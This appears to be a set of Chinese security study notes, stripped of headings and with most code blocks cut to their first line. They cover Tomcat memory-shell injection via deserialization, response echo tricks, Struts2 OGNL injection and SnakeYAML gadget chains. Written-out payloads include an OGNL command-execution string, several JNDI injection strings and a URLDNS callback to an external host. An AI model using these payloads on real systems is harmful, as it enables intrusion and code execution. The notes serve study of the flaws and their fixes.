虽然这样可以绕过检测,但是我们的序列化数据是二进制数据,直接加入垃圾数据破坏了序列化的结构,在readObject反序列化的时候并没有反序列化成功。
条件:
这么一看,集合类型就非常符合需求了。
1 | package com.review.test; |
所以这篇文章,我们来学习利用反序列化来实现真正的内存马注入,本文会使用CC11链来进行内存马的注入,实现真正的无文件落地内存马,在使用 jsp 注入的时候由于 request 和 response 是 jsp 的内置对象,所以在回显问题上不用考虑,但是当我们结合反序列化进行注入的时候这些都成了需要考量的地方
这里我们写一个简单的Servlet,模拟存在反序列化的点
1 | package com.sermemshell; |
这里使用Tomcat半通用回显,具体内容看Java回显技术
1 | package com.EXP; |
这里以Filter内存马为示例,获取 request 和 response,将命令执行结果写入response
跟着师傅的博客,自己翻阅着笔记,写出来这么一个东西T^T,对于搭建的漏洞环境,起码是可以注入了
1 | package com.EXP; |
这里就借用DrunkBaby师傅的POC,还是DrunkBaby的全面,对于很多东西考虑感觉是我达不到的高度了
1 | package EXP; |
这里使用CC11的链子,这里我们只能使用动态加载字节码的方式来进行注入
我们使用CC11链子,分别生成半通用回显和内存马注入的两个存储着序列化数据的文件
1 | package com.EXP; |
两者接注入即可,首先注入Tomcat半通用回显,其次注入Filter内存马
通过全局存储 Response 回显来打
直接用KpLi0rn师傅的这个项目来打shiro内存马https://github.com/KpLi0rn/ShiroVulnEnv
首先通过注入tomcatHeader.ser来绕过长度限制
最后用tomcatInject.ser注入回显内存马
该回显方法是基于proc/self/fd/i的攻击
在Linux环境下,可以通过文件描述符proc/self/fd/i获取到网络连接,在Java中我们可以直接通过文件描述符获取到一个Stream对象,对当前网络进行读写操作,可以釜底抽薪在根源上解决回显问题。简单来说就是利用linux文件描述符实现漏洞回显
如果我们获取到了当前请求对应进程的文件描述符,如果向输出描述符中写入内容,那么就会在回显中显示,从原理上可行,但是我们该如何获得本次请求描述符
解决这个问题就要思考在一次连接请求过程中有什么特殊的东西可通过代码识别出来,从而筛选出对应的请求信息。那么这个特殊的标识应该就是,客户端的访问ip地址了。
我们可以看到,在proc/net/tcp6中存储了大量连接请求
local_address 是服务端的地址和连接端口,remote_address 是远程机器的地址和端口,因此我们可以通过 remote_address 字段筛选出需要的 inode 号。这里的 inode 号会在 /proc/xx/fd/ 中的 socket 一一对应
去到 proc/{进程号}/fd 文件夹下,执行 ll 命令
有了这个对应关系,我们就可以在 /proc/xx/fd/ 目录中筛选出对应inode号的socket,从而获取了文件描述符。整体思路如下:
/proc/net/tcp6(/proc/net/tcp) 文件中筛选出对应的 inode 号/proc/{进程号}/fd/ 中筛选出fd号
从HTTP请求的入口开始往后,request和response几乎就是一路传递,且在内存中均为同一个变量(后面会将初始的req和res封装到了新的req和res中)
这样就代表着,我们只需要获取其中一个类中的response实例即可
根据上述思路,我们找到了ApplicationFilterChain对象中 静态的ThreadLocal保存的Response类型的属性lastServicedResponse
这里的静态代码块在初始时,已经把lastServiceResponse设置为null(WRAP_SAME_OBJECT默认为false)
这里的internalDoFilter方法将当前request和response对象赋值给lastServiceRequest和lastServiced对象的操作,但是需要ApplicationDispatcher.WRAP_SAME_OBJECT的值为true,同时需要两个对象为ThreadLocal类
因此这里需要有两个操作
ApplicationDispatcher.WRAP_SAME_OBJECT值为true,走到if判断中ThreadLocal类,默认为nullgetWriter重复使用报错
在使用response的getWriter函数时,usingWriter变量会被设置为true。如果在该请求中usingWriter变成了true,那么后面重复使用getWriter方法时就会报错
1 | //ResponseFacade#getWriter |
报错如下:getWriter已经被调用过一次
1 | java.lang.IllegalStateException: getWriter() has already been called for this response |
这里就有两种解决方法:
getWriter后反射修改usingWriter的值为falsegetOutputStream代替实现如下,需要访问两次,第一次为设置ApplicationDispathcer.WRAP_SAME_OBJECT变量为true以及为lastServicedResponse对象进行初始化为ThreadLocal对象;第二次从lastServicedResponse对象中取出response对象进行操作
1 | package com.echo.demos.web; |
大致流程图如下(个人理解,有问题请大佬指出)
这个方法有一些局限性,如果漏洞在ApplicationFilterChain进行lastServicedResponse.set(response);之前触发,就不会将我们的执行结果写入lastServicedResponse当中,那么我们在获取lastServicedResponse之中的response时就无法获取Tomcat Response进行回显
Shiro反序列化漏洞就遇到了这种情况,shiro的rememberMe功能是shiro自己实现的一个filter
1 | if (pos < n) { |
可以看到,首先获取所有Filter对当前请求进行拦截,通过后,再进行lastServicedResponse.set(response);操作,然后再进行servlet.service(request, response);
rememberMe功能是ShiroFilter的一个模块,在这部分逻辑中执行时,就会触发反序列化漏洞,还没进入到lastServicedResponse.set(response);的操作中,此时的lastServicedResponse内容就是空,从而也就获取不到我们想要的response
而现在这种方法是不再寻求改变代码流程,而是找找有没有Tomcat全局存储的request或response
我们知道,Tomcat处理HTTP请求的时候流程入口在org.apache.coyote.http11.Http11Processor类中,该类继承了AbstractProcessor类
1 | public class Http11Processor extends AbstractProcessor |
在AbstractProcessor类中,存在着两个属性request和response,且这两个属性都被final所修饰,说明这个值在赋值之后是无法被修改的
在AbstractProcessor类的构造函数中,就对request和response赋值了,那么我们只需要获取到Http11Processor类就可以拿到request和response
但是这里的request和response并不是静态变量,无法直接从类中提取出来,需要从对象里面获取。这时我们就需要去找存储Http11Processor或Http11Processor.request/response的变量
往回翻找调用方法,找到AbstractProtcol的内部类ConnectionHandler#process中有register(processor);这么一个操作,用register方法对Http11Processor进行操作
跟进到register方法中,可以看到rp是从Http11Processor中获取的RequestInfo类,rp中包含着request对象,而request对象中包含response对象,随后就对rp调用了setGlobalProcessor(global)
跟进setGlobalProcessor(global)中,可以看到这里把RequestInfo对象注册到了global中,这个global是AbstractProtcol内部类ConnectionHandler的一个属性
那么我们只要获取到global对象就可以获取到里面的response对象了,获取链如下
1 | AbstractProtocol$ConnectoinHandler --> global --> RequestInfo --> req --> response |
但是该global仍然不是static,因此我们还要找存储AbstractProtocol类或AbstractProtocol子类的参数
在调用栈中存在CoyoteAdapter类,其中connector对象的protocolHandler属性为Http11NioProtocol,http11NioProtocol的handler就是AbstractProtocol$ConnectoinHandler
获取链如下
1 | connector --> protocolHandler --> handler --> AbstractProtocol$ConnectoinHandler --> global-->RequestInfo --> req --> response |
现在最重要的问题就是,该如何去获取这个connector
在Tomcat的启动过程中会创建connector对象,并且通过addConnector方法放入connectors中
跟进到StandardService#addConnector方法中,该方法将传入的connector对象放到了StandardService对象的connectors[]数组中
现在获取链就变成了:
1 | StandardService --> connectors --> connector --> protocolHandler --> handler --> AbstractProtocol$ConnectoinHandler --> global --> RequestInfo --> req --> response |
connectors同样为非静态属性,那么我们就需要获取在Tomcat中已经存在的StandardService对象。
接下来的关键就在于,我们该如何获取StandardService的对象
我们回顾一下tomcat的架构
Service是Tomcat的最外层对象了,如果再往外就会涉及到Tomcat的类加载机制。Tomcat的类加载机制并不是传统双亲委派机制,因为双亲委派机制不适用于存在多个WebAPP的情况
假设WebApp A依赖了common-collection 3.1,而WebApp B依赖了common-collection 3.2 这样在加载的时候由于全限定名相同,不能同时加载,所以必须对各个webapp进行隔离,如果使用双亲委派机制,那么在加载一个类的时候会先去他的父加载器加载,这样就无法实现隔离,tomcat隔离的实现方式是每个WebApp用一个独有的ClassLoader实例来优先处理加载,并不会传递给父加载器。这个定制的ClassLoader就是WebappClassLoader。
与双亲委派机制相反,Tomcat加载机制为:WebAppClassLoader负责加载本身的目录下的class文件,加载不到时,才会交给CommonClassLoader加载
在SpringBoot项目中,alt+f8 计算看下Thread.currentThread().getContextClassLoader() 中的内容,可以看到再类加载器中,就包含了我们的StandardService对象。
1 | WebappClassLoader --> resources --> context --> context --> StandardService --> connectors --> connector --> protocolHandler --> handler --> AbstractProtocol$ConnectoinHandler --> global --> RequestInfo --> req --> response |
在整个调用链中,有些变量可以get方法获取,对于私有和保护属性的变量我们只能通过反射来获取了
对于不同版本的Tomcat获取方式不同,Tomcat8/9或者更低的版本,可以直接从webappClassLoaderBase.getResources().getContext()中获取
其实就是response经过了层层的封装,我们需要一层一层的剥开他的心~,对于存在getter方法的使用getter即可,对于私有保护属性的,使用反射获取即可
1 |
|
1 |
|
回顾我们的获取链
我们前面做的一些操作,就是为了获取AbstractProtocol$ConnectoinHandler该类,接下来我们也可以去寻找其他地方,该地方也存储着AbstractProtocol$ConnectoinHandler
1 | WebappClassLoader --> resources --> context --> context --> StandardService --> connectors --> connector --> protocolHandler --> handler --> AbstractProtocol$ConnectoinHandler --> global --> RequestInfo --> req --> response |
在org.apache.tomcat.util.net.AbstractEndpoint中的handler是AbstractEndpointHandler自定义的,同时Handler的实现类是AbstractProtocol$ConnectoinHandler
因为 AbstractEndpoint 是抽象类,抽象类不能被实例化,所以我们去寻找其对应的子类,只要获取到对应的子类后,我们就能获取 handler 中的 AbstractProtocol$ConnectoinHandler 从而进一步获取 request 了
这里我们看到他有四个子类
这里我们来看到 NioEndpoint 类。NioEndpoint 是主要负责接受和处理 socket 的且其中实现了socket请求监听线程Acceptor、socket NIO poller线程、以及请求处理线程池
此时有一下两种方法从Thread.currentThread().getThreadGroup() 获取的线程中遍历找出我们需要的NioEndpoint 对象。
遍历线程,获取线程中的target属性,如果该target是Acceptor类的话则其endpoint属性就是NioEndpoint 对象
利用链如下
1 | Thread.currentThread().getThreadGroup() --> theads[] --> thread --> target --> NioEndpoint$Poller --> NioEndpoint --> AbstractProtocol$ConnectoinHandler --> global --> RequestInfo --> req --> response |
遍历线程,获取线程中的target属性,如果target属性是 NioEndpointPoller 类的话,通过获取其父类 NioEndpoint,进而获取到 AbstractProtocol$ConnectoinHandler。
利用链如下
1 | Thread.currentThread().getThreadGroup() --> theads[] --> thread --> target --> NioEndpoint$Poller --> NioEndpoint --> AbstractProtocol$ConnectoinHandler --> global --> RequestInfo --> req --> response |
和我们低版本Tomcat的利用相类似,只是在获取AbstractProtocol$ConnectoinHandler的方式上有所不同
1 |
|
1 |
|
利用链太长了,POC超长,可能会存在org.apache.coyote.http11.AbstractHttp11Protocol 的maxHeaderSize的长度限制,可以通过修改maxHeaderSize来绕过限制。操作复杂较为复杂,可能有存在性能问题,整体来讲该方法不受各种配置的影响,通用型较强。
它使用相同的表达式去存取对象的属性。
表达式是OGNL表达式中最为核心的部分,所有的OGNL操作都是针对表达式解析后进行的。通过表达式来告诉OGNL操作到底要干什么。因此表达式是一个带有语法意义的字符串,该字符串会规定操作的类型和内容。OGNL 表达式支持大量的表达式,如 “链式访问对象”、表达式计算、甚至还支持 Lambda 表达式。
OGNL 的 Root 对象可以理解为 OGNL 的操作对象。当我们指定了一个表达式的时候,我们需要指定这个表达式针对的是哪个具体的对象。而这个具体的对象就是 Root 对象,这就意味着,如果有一个 OGNL 表达式,那么我们需要针对 Root 对象来进行 OGNL 表达式的计算并且返回结果。
有个 Root 对象和表达式,我们就可以使用 OGNL 进行简单的操作了,如对 Root 对象的赋值与取值操作。但是,实际上在 OGNL 的内部,所有的操作都会在一个特定的数据环境中运行。这个数据环境就是上下文环境(Context)。OGNL 的上下文环境是一个 Map 结构,称之为 OgnlContext。Root 对象也会被添加到上下文环境当中去。
1 | <dependency> |
我们先来创建两个实体类
Address.java
1 | package pojo; |
User.java
1 | package pojo; |
链式编程,如其名是一条长长的链子,类似如下
1 | StringBuffer buffer = new StringBuffer(); |
对应代码如下
1 | public class Test { |
当我们访问上下文环境中的参数时,需要在表达式前面加#,表示了与访问根ROOT对象的区别
对应代码如下
1 | public class Test { |
同样的,OGNL也可以对静态变量和静态方法进行调用,格式如\@[class]@[field/method ()]
对应代码如下
1 | public class Test { |
静态调用的类代码如下
1 | public class Static { |
其中调用静态方法时的返回的object2,是基于静态方法的返回值,这里师傅们可以自行修改尝试
对应代码如下
1 | public class Test { |
其中可以使用数字的加减,字符的拼接来访问,还有如下一些简单操作
1 | 2 + 4 // 整数相加(同时也支持减法、乘法、除法、取余 [% /mod]、) |
对应代码如下
1 | public class Test { |
选出集合当中相同属性组合成一个新的集合,语法为collection.{XXX},其中XXX是该集合中每个元素的公共属性
选择就是选出集合中符合条件的元素组合成一个新的集合,语法为collection.{Y XXX},其中Y是一个选择操作符,XXX是选择用的逻辑表达式
其中选择操作符有三种
对应代码如下
1 | public class Test { |
{},中间使用,进行分割#{},中间使用,进行分割键值对1 | public class Test { |
这里可以直接创建任意对象,感觉就很有攻击面了,可以直接命令执行
代码如下,两者皆可执行
1 | public class EvilCalc { |
而 Struts2 对 OGNL 表达式的解析使用了开源组件 opensymphony.xwork 2.0.3 所以会有漏洞
我们这里看到struts的Filter,org.apache.struts2.dispatcher.FilterDispatcher类的doFilter方法
在该方法中,它做了以下业务:
serviceAction()方法
在doFilter方法中下到断点,前面做了一些基础的数据转换和获取,最后我们跟进serviceAction方法
首先获取当前请求是否已经有ValueStack对象,如果是接收到chain跳转方式的请求时,能够接管上次请求的请求和数据。
如果没有 ValueStack 对象,获取当前线程的ActionContext对象;如果有 ValueStack 对象,将事先处理好的请求中的参数 put 到 ValueStack 中
后续获取 ActionMapping 中配置的 namespace, name, method 值
这里通过ActionProxyFactory创建了ActionProxy对象,在这个过程中也会创建StrutsActionProxy的实例,StrutsActionProxy是继承自com.opensymphony.xwork2.DefaultActionProxy,实际在该代理对象的内部就持有了DefaultActionInvocation的实例,下一步就为Action代理对象设置执行的方法。
继续跟进到proxy.execute()方法内,可以看到这里获取了上下文,并用setter方法赋值上下文
但这里只是对一些数据进行操作,具体的业务逻辑我们进入invoke方法中查看
进入invoke方法后,在interceptors.hasNext判断中,使用迭代器进行顺序递归执行配置的所有拦截器, 所迭代的内容是Struts包中default.xml文件内配置的interceptors标签中的内容
在这么多拦截器中,param是用来处理我们输入的参数的,所有对于OGNL表达式的处理,应该在这个interceptor中,对于该漏洞的本质,其实就是在Struct2中哪个地方进行了OGNL表达式的解析操作
在迭代器处理完成后,我们就进入到了invokeActionOnly方法中
在invokeActionOnly方法中,调用了invokeAction方法,我们走进该方法中调试,发现最后经过反射调用execute方法,开始处理用户的逻辑信息
1 | public String invokeActionOnly() throws Exception { |
处理完用户逻辑后,我们步出该方法,继续向下走,最终跟进executeResult()
首先用creatResult创建了一个result对象,主要逻辑肯定在execute方法内,继续跟进
走入execute方法中,继续走进doExecute方法内
在doExecute方法内,准备了发送响应信息,设置了pageContext参数
1 | public void execute(ActionInvocation invocation) throws Exception { |
之后会调用JspServlet来处理请求,解析标签时,在标签的开始和结束位置,分别调用对应实现类如org.apache.struts2.views.jsp.ComponentTagSupport中的 doStartTag()(一些初始化操作) 及 doEndTag() (标签解析后调用end方法)方法
1 | public int doEndTag() throws JspException { |
跟进evaluateParams方法,在该if判断中,因为altSyntax默认开启,所以走入if判断中
将username拼接进%{}中,这里本意是想使用%{username}来获取域中的username参数,但是由于存在循环解析,使用造成了OGNL注入
我们继续看到findValue方法中,进行寻找值的操作,并继续走入translateVariables方法
在这里,会将拼接好的%{username}中的%{和}截取,只剩下username
然后使用findValue方法,将我们所输入的username查找出来并赋值给o,也就是我们输入的%{10*10},然后进行新的一次循环,将我们输入的东西再次当成OGNL表达式解析,就造成了此漏洞
1 | %{(new java.lang.ProcessBuilder(new java.lang.String[]{"calc"})).start()} |
官方修复如下
1 | public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) { |
其中很明显多了一段代码,这里判断了循环的次数,从而在解析到%{1+1}的时候不会继续向下递归
1 | if (loopCount > maxLoopCount) { |
使用冒号,格式如下(冒号后面要加空格)
1 | key: value |
而缩进可以用来代表层级关系(隐隐约约记得在spring的配置文件中是这么搞得)
1 | key: |
使用一个短横线和一个空格代表一个数组项
1 | hobby: |
Yaml中提供多种的常量结构:整数,浮点数,字符串,NULL,日期,布尔,时间
1 | boolean: |
1 | <dependency> |
先写一个实体类Person.java,序列化和反序列化都用的是这个实体类
1 | public class Person { |
1 | public static void serialize() throws Exception{ |
序列化的结果如下,调用了两个属性的getter方法
下面的!!类似于 Fastjson 中的 @type 用于指定反序列化的全类名,后面的就类似于Fastjson中的赋值
loadAs函数进行反序列化,其中反序列化对象的类需要指定,而赋值的参数和值,需要符合Yaml的语法格式
1 | public static void unserialize() { |
这里我们可以看到,两者的效果是一样的,且在进行反序列化的时候,都调用了两个属性的setter方法
我们需要去改写一下我们的Person类,使他内部不只有private作用域的属性
改写后如下,我们加入了作用域为public和protect的属性,并且都写了这两个属性的setter与getter方法
1 | package com; |
我们去修改一下序列化和反序列化的代码(这里就不再演示loadAs函数的使用)
1 | public static void serialize() throws Exception{ |
运行后,我们可以看到,在序列化和反序列化的时候,都没有调用public作用域属性的setter与getter方法
进入Yaml#dump中,首先new了一个ArrayList,将传入的data放入list中,在dumpAll方法内,传入了一个list.iterator()
1 | public String dump(Object data) { |
这里的list.iterator仅仅是返回了一个Itr(迭代器),用来管理list的遍历,然后执行dumpAll函数
1 | public Iterator<E> iterator() { |
进入dumpAll函数中,该方法将一个Java对象转换成yaml格式的字符串(这里传参是个存在迭代器的类)
这里StringWriter是一个用于在内存中处理字符串的东西,这里的流程就是创建一个StringWriter,将Java转换成的yaml格式字符串写入内存中,最后buffer.toString将内存中的字符串转换成一个实际的字符串
1 | public String dumpAll(Iterator<? extends Object> data) { |
继续跟进,这里new了一个Serializer类(yaml序列化器,将java对象转换为yaml格式数据流)
然后放入一个Emitter(据了解是一个yaml输出器,将data内容写入output中)
然后使用迭代器遍历data,获取类里面的key:value键值对
将键值对中的数据写入output中
1 | private void dumpAll(Iterator<? extends Object> data, Writer output, Tag rootTag) { |
我们继续跟进represent,主要流程肯定在该方法中的representData函数,我们继续跟入
在representData中,首先data会经过一些判断,但是这些判断我们都不会进去
在该方法中没有对数据进行处理,都是一些判断,最终走到// check defaults部分的representData函数中,因此核心部分还得向里面走
1 | //BaseRepresenter#represent |
进入RepresentJavaBean#representData,我们看传入representJavaBean的参数
Set类对象(该对象中,存放着data该类中的各个变量信息)1 | protected class RepresentJavaBean implements Represent { |
进入Representer#representJavaBean后,properties存放着所有的变量信息(但是在该变量中没有找到value值),而javaBean中只存放着作用域为private的属性
后面比较重要的地方,应该是在for循环中,它将Set中的每一个MethodeProperty遍历出来,使用property.get(javaBean)去获取javaBean中与MethodeProperty相对应的变量
1 | protected MappingNode representJavaBean(Set<Property> properties, Object javaBean) { |
再进入到representJavaBeanProperty方法中,该方法将对象中的数据,拆解成了键值对,从返回的new NodeTuple(nodeKey, nodeValue);中我们也可以看出来这一点
1 | protected NodeTuple representJavaBeanProperty(Object javaBean, Property property, |
大致的工作流程就是如上所示,最后我们的键值对会保存到 list 当中
我在这里并没有找到,为什么没有调用作用域为public变量的setter方法,感觉有点乱乱的
走进load方法,这里将我们的yaml数据放入一个StreamReader中,并调用loadFromReader方法
1 | public <T> T load(String yaml) { |
前面两行代码,主要是从SreamReder流中读取YAML数据,并将其组合成YAML结构
最后constructor.getSingleData(type)才是将YAML数据转化为Java对象的操作
1 | private Object loadFromReader(StreamReader sreader, Class<?> type) { |
进入到getSingleData后,首先会创建一个Node对象(将字符串按照yaml语法转化为Node对象),然后判断type类型是否为Object,然后判断rootTag是否为空,这里我们都能跳过去,最后走到constructDocument(node)方法内
1 | public Object getSingleData(Class<?> type) { |
我们可以看到,在Node对象中,保存着我们的参数的各种属性(类型,参数名,value值)
constructDocument() 方法的最终目的是构建一个完整的 YAML 文件,如果文件是递归结构,再进行二次处理(这里的递归结构其实就是我后面会讲的[!!]这个)。我们这里跟进一下 constructObject() 方法
1 | protected final Object constructDocument(Node node) { |
该方法中,通过containsKey方法来判断是否该节点已经被构造,若已构造,则会返回一个实例化过后的对象;反之,就会用指定的node节点构造对象,并返回对象
1 | protected Object constructObject(Node node) { |
这里我们的节点并没有被构造过,所以会跳到constructObjectNoCheck方法中
我们可以看到,这里将node节点放进到了recursiveObjects中,然后往下进行了一次判断:constructedObjects是否构造了该节点,如果构造了就用get方法获取到他,若没有构造,就调用construct方法
1 | protected Object constructObjectNoCheck(Node node) { |
步入construct方法,步入ConstructYamlObject的construct当中,但是这里没有做什么操作
1 | public Object construct(Node node) { |
这里我们先看getConstructor方法中,getClassForNode方法为我们返回了一个Class类,后续setType方法为node设置了一个合适的类构造,后续走入getClassForNode方法
1 | private Construct getConstructor(Node node) { |
在该getClassForNode方法中,他主要是通过反射为我们的node节点选取了一个合适的构造类
1 | protected Class<?> getClassForNode(Node node) { |
返回我们的构造类后,我们走入construct方法中,这里我们会跳到最后一个else中,将我们的类进行实例化,这里node.isTwoStepsConstruction()默认返回false,所以我们会进入到最后一个else中,将obj放入constructJavaBean2ndStep构造函数中并返回
1 | public Object construct(Node node) { |
我们可以看到,实例化已经完成
跟进constructJavaBean2ndStep函数中,该函数会从node中获取key和value的值,并赋值到我们的object参数中,最终返回一个完整的类
我们之前说过,如果添加public属性,是不会调用该类的setter或getter方法的
除public属性外的设置值或者获取值时,都是要反射获取他们的setter或者getter方法去完成相关的业务
而经过调试来看,public属性的参数在获取值或者设置值的时候,和其他属性的是有差别的,public属性值的设置与获取,只是简单的反射获取与修改
这里就不做过多分析,如果有想要跟进一下代码的师傅,可以从下面方法去跟进分析
1 | //constructJavaBean2ndStep |
有些区别的是,Fastjson中可以调用getter/setter的面很宽泛,而Snakeyaml只能调用非public,static以及transient作用域的setter方法
1 | public class SPInScriptEngineManager { |
这里可以看到,也是成功接收到了URLDNS请求
该EXP只能进行简单的探测,攻击的话,可以使用Github上的一个项目
https://github.com/artsploit/yaml-payload/
我们将项目中的命令,改成自己想要的就好
然后使用如下两条命令,将该java文件打包成一个jar包,使用python开启一个http服务
1 | javac src/artsploit/AwesomeScriptEngineFactory.java |
使用如下payload,就可以用URLClassLoader去加载远程类
1 | public static void main(String[] args) { |
那么如果需要使用 SPI 机制则需要在Java classpath下的META-INF/services/目录里创建一个以服务接口命名的文件,这个文件里的内容就是这个接口的具体的实现类
SPI是一种动态替换发现的机制,比如有个接口,想运行时动态的给它添加实现,你只需要添加一个实现
这里使用JDBC的库 – mysql-connector-java 来举例子
1 | <dependency> |
我们可以看到META-INF/services/路径下的文件名就是我们的服务接口名,内容就是接口的具体实现类
而数据库有很多种类型,而实现方式不尽相同,而在实现各种连接驱动的时候,只需要添加java.sql.Driver实现接口,然后 Java 的 SPI 机制可以为某个接口寻找服务实现,就实现了各种数据库的驱动连接
1 | public class JDBCTest { |
工作原理如下:
DriverManager.getConnection() 被调用时,ServiceLoader 通过 META-INF/services/java.sql.Driver 加载注册的驱动类。
ServiceLoader 发现 com.mysql.cj.jdbc.Driver 并自动实例化。
DriverManager 通过 Driver#connect() 方法建立数据库连接。
访问到jar包时,会扫描META-INF/services下的文件,扫到javax.script.ScriptEngineFactory,会创造这个接口的具体实现类,这个具体实现类就是artsploit.AwesomeScriptEngineFactory,也就是我们构造的恶意类。
这条链子也很熟悉了,在JdbcRowSetImpl#connect方法中,存在一个JNDI注入的地方(lookup处)
1 | private Connection connect() throws SQLException { |
getDataSourceName方法返回了dataSource,而我们存在一个dataSource的setter方法,在进行反序列化时,会调用setDataSourceName方法,因此在lookup方法中,this.getDataSourceName()处是可控的
1 | public String getDataSourceName() { |
接下来我们就该怎么去触发connect方法
我们找到了setAutoCommit方法,他既可以调用connect,也是一个我们可以调用的setter方法,(参数都为private属性)
1 | public void setAutoCommit(boolean var1) throws SQLException { |
EXP如下
1 | String payload = "!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: \"ldap://127.0.0.1:8085/WRTOPmjx\", autoCommit: true}"; |
1 | <dependency> |
PropertyPathFactoryBean#setBeanFactory方法中调用了this.beanFactory的getBean方法,而SimpleJndiBeanFactory的getBean方法中存在JNDI注入点
看到SimpleJndiBeanFactory#getBean方法,其中name可控,即可造成JNDI注入
1 |
|
在SimpleJndiBeanFactory#getBean方法中,如果想造成jndi,我们就需要走入else代码块中
我们看到isSingleton方法内,要判断shareableResources中是否包含name(即为我们的ldap地址),因此我们需要为shareableResources赋值
1 | public boolean isSingleton(String name) throws NoSuchBeanDefinitionException { |
在shareableResources的setter方法中可以看到,该setter方法是为该参数添加一个String类,我们只需要将我们的ldap地址传入即可
1 | public void setShareableResources(String... shareableResources) { |
除此之外,在setBeanFactory方法内,存在一些对链子有一些干扰的参数,我们只需要简单赋值即可越过
EXP如下
1 | public class YamlSpring { |
1 | <dependency> |
链尾在ContextUtil内部类ReadOnlyBinding的getObject方法中,其中有一个resolve方法
1 | public Object getObject() { |
NamingManager.getObjectInstance就是我们的JNDI漏洞点,我们只需要将我们的ldap地址,包装为一个Reference传入到该方法中,即可造成JNDI注入
1 | public static Object resolve(Object value, String stringName, Name parsedName, Context nameCtx) throws NamingException { |
这样就构造好了Reference类
1 | "!!javax.naming.Reference [\"Sean\",\"WRTOPmjx\",\"http://127.0.0.1:8085/\"]" |
接下来构造ReadOnlyBinding类(这里的第三个参数,我找到的是InitialContext类)
1 | String payload = "!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding [\"Sean\",!!javax.naming.Reference [\"Sean\",\"WRTOPmjx\",\"http://127.0.0.1:8085/\"],!!javax.naming.InitialContext {}]" |
我们将我们的类,反序列化后,调用其getObject方法,观察是否能执行
1 | public class XBean { |
在执行getObject时,爆出了错误,发现是我们的Context有问题,这里就直接换成别的师傅那里拿来的WritableContext类了
使用如下POC,调用getObject方法,即可造成JNDI注入
1 | String payload = "!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding [\"Sean\",!!javax.naming.Reference [\"Sean\",\"WRTOPmjx\",\"http://127.0.0.1:8085/\"],!!org.apache.xbean.naming.context.WritableContext {}]"; |
但是我们该怎么去触发这个getObject方法
其中我们找到BadAttributeValueExpException类,可以看到这里去调用了传入val的toString方法,而ReadOnlyBinding是没有toString方法的,那就看他的父类
1 | public BadAttributeValueExpException (Object val) { |
恰巧他的父类Binding的toString方法中,调用了本类的getObject方法,即可触发
1 | public static final class ReadOnlyBinding extends Binding |
最终EXP如下
1 | String payload = "!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding [\"Sean\",!!javax.naming.Reference [\"Sean\",\"WRTOPmjx\",\"http://127.0.0.1:8085/\"],!!org.apache.xbean.naming.context.WritableContext {}]]"; |
EXP如下
1 | public class C3P0JndiRefForwardingDataSourceEXP { |
1 | String poc = "!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\n" + |
1 | <dependency> |
感觉这条链子逆向分析较难,我先把EXP放出来(太难了TvT)
1 | poc = "!!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], \"rmi://127.0.0.1:1099/Exploit\"]]: 1"; |
这里是利用Map调用key的hashCode时所造成的利用链
从EXP来看,会调用JNDIConfiguration#hashCode方法,但是该类没有hashCode方法,就会向上调用,实际执行了AbstractMap#hashCode
1 | public int hashCode() { |
在上面调用entrySet().iterator()即调用ConfigurationMap.ConfigurationSet#iterator,然后回调用JNDIConfiguration的getKeys方法
1 | public Iterator<Map.Entry<Object, Object>> iterator() { |
getKeys方法会调用到getBaseContext方法内
1 | public Iterator<String> getKeys() { |
在这里的lookup方法就会造成JNDI注入
1 | public Context getBaseContext() throws NamingException { |
1 | String payload = "{!!java.net.URL [\"http://ra5zf8uv32z5jnfyy18c1yiwfnle93.oastify.com/\"]: 1}"; |
我们根据urldns链可以知道key会进行hashCode方法的调用,之后进行urldns的解析
SnakeYaml在进行map的处理的时候将会对key进行hashCode处理,所以我们尝试map的格式
1 | HashMap hashMap = new HashMap(); |
所以我们就可以按照这种使用{ }包裹的形式构造map,然后将指定的URL置于key位置
1 | String poc = "{!!java.util.Map {}: 0,!!java.net.URL [\"http://tcbua9.ceye.io/\"]: 1}"; |
在前面加上需要探测的类,在反序列化的过程中如果没有报错,就说明反序列化成功了的,进而存在该类
这里创建对象的时候使用的是{}这种代表的是无参构造,所以需要存在有无参构造函数,不然需要使用[]进行赋值构造
修复方法就是通过添加new SafeConstructor()进行过滤,如下
1 | Yaml yaml = new Yaml(new SafeConstructor()); |
JDBC是Java DataBase Connectivity的缩写,它是Java程序访问数据库的标准接口。
使用Java程序访问数据库时,Java代码并不是直接通过TCP连接去访问数据库,而是通过JDBC接口来访问,而JDBC接口则通过JDBC驱动来实现真正对数据库的访问。
连接池类似于线程池,在一些情况下我们会频繁地操作数据库,此时Java在连接数据库时会频繁地创建或销毁句柄,增大资源的消耗。为了避免这样一种情况,我们可以提前创建好一些连接句柄,需要使用时直接使用句柄,不需要时可将其放回连接池中,准备下一次的使用。类似这样一种能够复用句柄的技术就是池技术。
1 | <dependency> |
1 | public static Object referenceToObject( Reference ref, Name name, Context nameCtx, Hashtable env) |
接下来我们要去看,在哪里调用了ReferenceableUtils#referenceToObject
ReferenceIndirector 的getObject方法调用了前者
继续向上找,在PoolBackedDataSourceBase的readObject方法中,调用了这里
且这个方法是一个类的readObject方法,是一个入口
流程如下:
但是想要达到我们的目的,还是差一点距离
1 | public static void main(String[] args) throws Exception { |
我们来看入口类的readObject方法
我们可以看到,如果想走到getObject处,需要我们反序列化后的类,是一个IndirectlySerialized类或者继承于这个类
且在执行完这行代码后,执行了this.connectionPoolDataSource = (ConnectionPoolDataSource) o;,这里将我们传入的类,强转成了ConnectionPoolDataSource,并赋值给connectionPoolDataSource
1 | private void readObject( ObjectInputStream ois ) throws IOException, ClassNotFoundException |
是不是感觉这里要求我们反序列化后的类为IndirectlySerialized是不可能的,我们看一下PoolBackedDataSourceBase的writeObject方法,三步之内必有解药
该方法内,有着一处indirector.indirectForm( connectionPoolDataSource ),而从上述代码中可以看到,indirector是一个ReferenceIndirector类,等价于ReferenceIndirector.indirectForm(connectionPoolDataSource)
且我们的connectionPoolDataSource不应继承序列化接口,在尝试序列化接口时失败,才能走入catch中
1 | private void writeObject( ObjectOutputStream oos ) throws IOException |
